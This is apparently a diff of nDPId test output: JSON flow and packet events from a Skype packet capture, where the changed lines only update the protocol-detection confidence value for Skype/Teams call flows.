00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":744,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970655837,"flow_last_seen":1431970655837,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970655837,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.154","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":744,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":1,"flow_last_seen":1431970655837,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1431970655837,"pkt":"0NQSxnP1PBXCt3IOCABFAAA4DEcAAEARVQbAqAEiQAQXmjLdnGAAJHYfeyMC79DK\/hLwI0tI0UYsgGEWGk5hr4E5iC40QQ=="} -00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":744,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970655837,"flow_last_seen":1431970655837,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970655837,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.154","src_port":13021,"dst_port":40032,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":744,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970655837,"flow_last_seen":1431970655837,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970655837,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.154","src_port":13021,"dst_port":40032,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":745,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970655837,"flow_last_seen":1431970655837,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970655837,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.33","src_port":13021,"dst_port":40002,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":745,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":102,"flow_packet_id":1,"flow_last_seen":1431970655837,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1431970655837,"pkt":"0NQSxnP1PBXCt3IOCABFAAA5ayYAAEARfGrAqAEinTg0ITLdnEIAJe9eeyUCb3+11x21V+othQ6FZpV0z1bnAthdPIEc8bI="} -00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":745,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970655837,"flow_last_seen":1431970655837,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970655837,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.33","src_port":13021,"dst_port":40002,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":745,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970655837,"flow_last_seen":1431970655837,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970655837,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.33","src_port":13021,"dst_port":40002,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":746,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":2,"flow_last_seen":1431970656151,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970656151,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADMGtI2dODQswKgBIpxUyC6j+8V4XpsVFaASOJDYRQAAAgQFrAQCCApMZ\/6WPjHZGQEDAwk="} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":747,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":3,"flow_last_seen":1431970656151,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970656151,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0HiFAAEAGiXTAqAEinTg0LMgunFRemxUVo\/vFeYAQECwuNgAAAQEICj4x2lNMZ\/6W"} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":754,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970656861,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.42","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":754,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":103,"flow_packet_id":1,"flow_last_seen":1431970656861,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"thread_ts_msec":1431970656861,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1wZMAAEARPVPAqAEib91KKjLdnEYAIaXieycCe1fKnMoPyS7sKN+ClU5dh7E8u7Wn6g=="} -00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":754,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970656861,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.42","src_port":13021,"dst_port":40006,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":754,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970656861,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.42","src_port":13021,"dst_port":40006,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":755,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431970656861,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.172","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":755,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":104,"flow_packet_id":1,"flow_last_seen":1431970656861,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1431970656861,"pkt":"0NQSxnP1PBXCt3IOCABFAAA3VcEAAEAR2kbAqAEinTfrrDLdnFQAI1TmeykCBTNtXbhMDQf2D6UV0R3mHu30wTeW\/+eg"} -00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":755,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431970656861,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.172","src_port":13021,"dst_port":40020,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":755,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431970656861,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.172","src_port":13021,"dst_port":40020,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":756,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970656861,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.167","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":756,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":105,"flow_packet_id":1,"flow_last_seen":1431970656861,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1431970656861,"pkt":"0NQSxnP1PBXCt3IOCABFAAAylicAAEARmerAqAEinTfrpzLdnF0AHsxpeysCNBmO6n4oPt4qGVJFTPBgQCMCbA=="} -00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":756,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970656861,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.167","src_port":13021,"dst_port":40029,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":756,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970656861,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.167","src_port":13021,"dst_port":40029,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":757,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970656861,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.140","src_port":13021,"dst_port":40003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":757,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":106,"flow_packet_id":1,"flow_last_seen":1431970656861,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1431970656861,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+1C4AAEARDvPAqAEinTc4jDLdnEMAKhWUey0Ck6OV07meiCUQoBZZK2TePWK3VEloqo0Om\/LmRrc7qA=="} -00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":757,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970656861,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.140","src_port":13021,"dst_port":40003,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":757,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970656861,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.140","src_port":13021,"dst_port":40003,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":758,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970656861,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.156","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":758,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":1,"flow_last_seen":1431970656861,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1431970656861,"pkt":"0NQSxnP1PBXCt3IOCABFAABBaS8AAEARxk7AqAEi1ceznDLdnF8ALXpUey8C35QflkiVLuyYHEgftQvOcxrFG1PZDcVv\/V5f70upN2kVjw=="} -00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":758,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970656861,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.156","src_port":13021,"dst_port":40031,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":758,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970656861,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.156","src_port":13021,"dst_port":40031,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":764,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970657448,"flow_last_seen":1431970657448,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970657448,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":51247,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":764,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":108,"flow_packet_id":1,"flow_last_seen":1431970657448,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970657448,"pkt":"0NQSxnP1PBXCt3IOCABFAABAHFJAAEAGizfAqAEinTg0LMgvAbu6eq5bAAAAALAC\/\/9TfQAAAgQFtAEDAwUBAQgKPjHfXgAAAAAEAgAA"} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":765,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":108,"flow_packet_id":2,"flow_last_seen":1431970657789,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970657789,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADMGtI2dODQswKgBIgG7yC\/usf9LunquXKASOJDxVgAAAgQFrAQCCApMaAAoPjHfXgEDAwk="} @@ -390,119 +390,119 @@ 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":768,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":1,"flow_last_seen":1431970657867,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970657867,"pkt":"0NQSxnP1PBXCt3IOCABFAABAUUpAAEAGahfAqAEib91Nr8gwnF4IVezmAAAAALAC\/\/8+qQAAAgQFtAEDAwUBAQgKPjHhAAAAAAAEAgAA"} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":769,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970657867,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.13","src_port":13021,"dst_port":40021,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":769,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":110,"flow_packet_id":1,"flow_last_seen":1431970657867,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1431970657867,"pkt":"0NQSxnP1PBXCt3IOCABFAAA9oHUAAEARRyvAqAEinTg0DTLdnFUAKQgoezEC\/l8nlzJZpnLIFE7P8fkc8mrPmKIpl9hxLirEQuOc"} -00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":769,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970657867,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.13","src_port":13021,"dst_port":40021,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":769,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970657867,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.13","src_port":13021,"dst_port":40021,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":770,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970657867,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.27","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":770,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":111,"flow_packet_id":1,"flow_last_seen":1431970657867,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1431970657867,"pkt":"0NQSxnP1PBXCt3IOCABFAAA4f1AAAEARf6LAqAEib91KGzLdnFsAJDT4ezMCrsyhXN3LQtIkyb75hiLtvYPm8jFPNUJJrw=="} -00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":770,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970657867,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.27","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":770,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970657867,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.27","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":771,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970657867,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":771,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":112,"flow_packet_id":1,"flow_last_seen":1431970657867,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1431970657867,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+qWkAAEARhrHAqAEinTfrkjLdgQkAKiNZezUC\/2slHaKqOmhTH+zKnxlHa\/OJZyFRbGPJo\/ii7tiMOQ=="} -00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":771,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970657867,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": 